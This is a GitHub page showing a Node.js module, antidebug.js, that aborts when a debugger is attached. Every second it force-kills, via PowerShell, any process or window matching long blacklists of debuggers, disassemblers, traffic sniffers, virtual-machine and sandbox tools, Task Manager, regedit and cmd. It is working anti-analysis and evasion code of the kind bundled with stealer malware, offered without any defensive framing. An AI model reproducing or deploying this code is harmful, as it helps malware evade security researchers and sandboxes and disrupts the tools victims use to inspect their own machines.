-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathantidebug.js
127 lines (118 loc) · 4.62 KB
/
antidebug.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
const child_process = require('child_process');
const TerminateProcess = (pid) => {
return new Promise((resolve, reject) => {
try {
child_process.exec(`powershell Stop-Process -Id ${pid} -Force`, (error, stdout, stderr) => {
if (!error) {
resolve(pid);
} else {
reject(error);
}
});
} catch (error) {
reject(error);
}
});
};
const KillProcessesByNames = (blacklist) => {
return new Promise((resolve, reject) => {
try {
const blacklistRegex = blacklist.map(name => name.toLowerCase()).join('|');
child_process.exec(`powershell "Get-Process | Where-Object { $_.Name -match '${blacklistRegex}' } | ForEach-Object { Stop-Process -Id $_.Id -Force }"`, (error, stdout, stderr) => {
if (!error) {
resolve('Finish Process');
} else {
reject(error);
}
});
} catch (error) {
reject(error);
}
});
};
const GetWindowProcesses = () => {
return new Promise((resolve, reject) => {
try {
child_process.exec(`powershell "(Get-Process | Where-Object { $_.MainWindowTitle -ne '' }) | ForEach-Object { $_.Id, $_.MainWindowTitle }"`, (error, stdout, stderr) => {
if (!error) {
const processInfo = stdout.split('\n').map(line => line.trim()).filter(Boolean);
resolve(processInfo);
} else {
reject(error);
}
});
} catch (error) {
reject(error);
}
});
};
const KillProcessesByWindowNames = async (blacklist) => {
try {
const processes = await GetWindowProcesses();
processes.forEach((processInfo, index) => {
if (index % 2 !== 0) {
const title = processInfo.toLowerCase();
const pid = processes[index - 1];
blacklist.forEach(async (name) => {
if (title.includes(name)) {
try {
await TerminateProcess(pid);
} catch (error) {
}
}
});
}
});
} catch (error) {
console.error(error);
}
};
const IsDebuggerPresent = () => {
return new Promise((resolve, reject) => {
try {
child_process.exec('powershell "[System.Diagnostics.Debugger]::IsAttached"', (error, stdout, stderr) => {
if (!error) {
resolve(stdout.trim() === 'True');
} else {
reject(error);
}
});
} catch (error) {
reject(error);
}
});
};
module.exports = async () => {
const windowBlacklist = [
"process monitor", "protection_id", "de4dotmodded", "x32_dbg", "pizza", "fiddler",
"x64_dbg", "httpanalyzer", "strongod", "wireshark", "gdb", "graywolf", "x64dbg",
"ksdumper v1.1 - by equifox", "wpe pro", "ilspy", "dbx", "ollydbg", "x64netdumper",
"system explorer", "mdbg", "kdb", "charles", "stringdecryptor", "phantom",
"debugger", "extremedumper", "pc-ret", "folderchangesview", "james",
"simpleassemblyexplorer", "dojandqwklndoqwd", "procmon64", "process hacker",
"scyllahide", "kgdb", "systemexplorer", "proxifier", "debug", "httpdebug",
"httpdebugger", "0harmony", "mitmproxy", "ida -", "codecracker", "ghidra", "titanhide",
"hxd", "reversal", "sharpod", "http debugger", "dbgclr", "x32dbg", "sniffer", "petools",
"simpleassembly", "ksdumper", "dnspy", "x96dbg", "de4dot", "exeinfope",
"windbg", "mdb", "harmony", "systemexplorerservice", "megadumper",
];
const blacklist = [
"ksdumperclient", "regedit", "ida64", "vmtoolsd", "vgauthservice",
"wireshark", "x32dbg", "ollydbg", "vboxtray", "df5serv", "vmsrvc",
"vmusrvc", "taskmgr", "vmwaretray", "xenservice", "pestudio", "vmwareservice",
"qemu-ga", "prl_cc", "prl_tools", "cmd", "joeboxcontrol", "vmacthlp", "httpdebuggerui",
"processhacker", "joeboxserver", "fakenet", "ksdumper", "vmwareuser", "fiddler",
"x96dbg", "dumpcap", "vboxservice",
];
try {
if (await IsDebuggerPresent()) {
process.abort();
}
setInterval(async () => {
await KillProcessesByWindowNames(windowBlacklist);
await KillProcessesByNames(blacklist);
}, 1000);
} catch (error) {
console.error(error);
}
};